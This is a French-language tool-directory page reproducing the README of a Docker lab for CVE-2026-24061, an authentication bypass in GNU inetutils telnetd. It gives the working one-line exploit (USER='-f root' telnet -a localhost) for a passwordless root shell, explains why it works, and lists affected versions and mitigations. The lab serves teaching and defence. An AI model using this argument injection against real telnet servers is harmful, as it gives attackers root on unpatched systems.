Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Ceci est un PoC simple qui vous permet de mettre en évidence la gravité du bug Telnet en cours, actuellement activement exploité. Pourquoi les gens utilisent encore Telnet... cela me dépasse. | Kitploit
Outils/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Ceci est un PoC simple qui vous permet de mettre en évidence la gravité du bug Telnet en cours, actuellement activement exploité. Pourquoi les gens utilisent encore Telnet... cela me dépasse.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
15il y a 7 moisPas encore vérifié

CVE-2026-24061 : Contournement d'authentification dans GNU inetutils-telnetd

Un laboratoire Docker pour démontrer la CVE-2026-24061 — une vulnérabilité critique de contournement d'authentification dans GNU inetutils telnetd qui est restée non corrigée pendant 11 ans.

La vulnérabilité

Telnetd transmet la variable d'environnement USER directement à /usr/bin/login sans assainissement. Le binaire login possède un indicateur -f qui ignore l'authentification (destiné aux sessions pré-authentifiées). En définissant USER='-f root', un attaquant trompe login pour lui accorder un accès root sans mot de passe.

Versions concernées : GNU inetutils 1.9.3 (mars 2015) jusqu'à 2.7 Score CVSS : 9,8 (Critique) Correctif : Mettre à jour vers inetutils 2.8+

Démarrage rapide

root@kitploit:~
# Construire l'image
docker build -t telnetd-exploit .

# Exécuter le conteneur (vous place dans un shell en tant que user1)
docker run --rm -it telnetd-exploit

# Exploit — obtenir root sans mot de passe
USER='-f root' telnet -a localhost

Vous atterrirez dans un shell root. Exécutez whoami pour confirmer.

Comment cela fonctionne

root@kitploit:~
1. Le client se connecte avec : USER='-f root' telnet -a localhost
2. telnetd reçoit la variable d'environnement USER : "-f root"
3. telnetd exécute : /usr/bin/login -f root
4. login interprète -f comme « ignorer l'authentification, l'utilisateur est pré-vérifié »
5. L'attaquant obtient un shell root — aucun mot de passe requis

Pourquoi -f existe

L'indicateur -f est légitime — il est destiné aux scénarios où un utilisateur est déjà authentifié (par exemple, à partir d'une session locale de confiance). Le bug est que telnetd n'assainit pas la variable USER avant de la transmettre à login, permettant aux attaquants distants d'injecter l'indicateur.

Impact

En janvier 2026 :

  • ~800 000 serveurs Telnet exposés mondialement (Shadowserver)
  • ~290 000 indexés sur Shodan
  • Vulnérabilité activement exploitée dans la nature (catalogue KEV de la CISA)

Pourquoi vous ne devriez pas utiliser Telnet

Même sans ce bug, Telnet transmet tout en texte clair — y compris les mots de passe. Utilisez SSH à la place.

ProtocoleChiffrementAuthentification
TelnetAucunTexte clair
SSHOuiClé/Mot de passe

Fichiers

root@kitploit:~
.
├── Dockerfile              # Construit le conteneur Debian vulnérable
├── docker-entrypoint.sh    # Démarre inetd, bascule vers user1
└── README.md

Atténuation

  1. Mettre à jour vers GNU inetutils 2.8+
  2. Désactiver telnetd — bloquer le port 23
  3. Utiliser SSH — nous sommes en 2026

Références

  • CVE-2026-24061
  • Avis original
  • Entrée KEV de la CISA

Crédits

Laboratoire basé sur leonjza/inetutils-telnetd-auth-bypass

Télécharger l’outil